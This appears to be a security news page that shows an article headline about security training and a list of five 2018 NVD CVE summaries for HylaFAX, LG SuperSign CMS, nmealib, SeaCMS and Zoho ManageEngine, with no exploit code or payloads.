6 Security Training Hacks to Increase Cyber IQ Org-Wide

Enterprise Vulnerabilities
From DHS/US-CERT’s National Vulnerability Database CVE-2018-17141
PUBLISHED: 2018-09-21

HylaFAX 6.0.6 and HylaFAX+ 5.6.0 allow remote attackers to execute arbitrary code via a dial-in session that provides a FAX page with the JPEG bit enabled, which is mishandled in FaxModem::writeECMData() in the faxd/CopyQuality.c++ file.

CVE-2018-17173
PUBLISHED: 2018-09-21

LG SuperSign CMS allows remote attackers to execute arbitrary code via the sourceUri parameter to qsr_server/device/getThumbnail.

CVE-2018-17174
PUBLISHED: 2018-09-21

A stack-based buffer overflow was discovered in the xtimor NMEA library (aka nmealib) 0.5.3. nmea_parse() in parser.c allows an attacker to trigger denial of service (even arbitrary code execution in a certain context) in a product using this library via malformed data.

CVE-2018-16822
PUBLISHED: 2018-09-21

SeaCMS 6.64 allows SQL Injection via the upload/admin/admin_video.php order parameter.

CVE-2018-16833
PUBLISHED: 2018-09-21

Zoho ManageEngine Desktop Central 10.0.271 has XSS via the "Features & Articles" search field to the /advsearch.do?SUBREQUEST=XMLHTTP URI.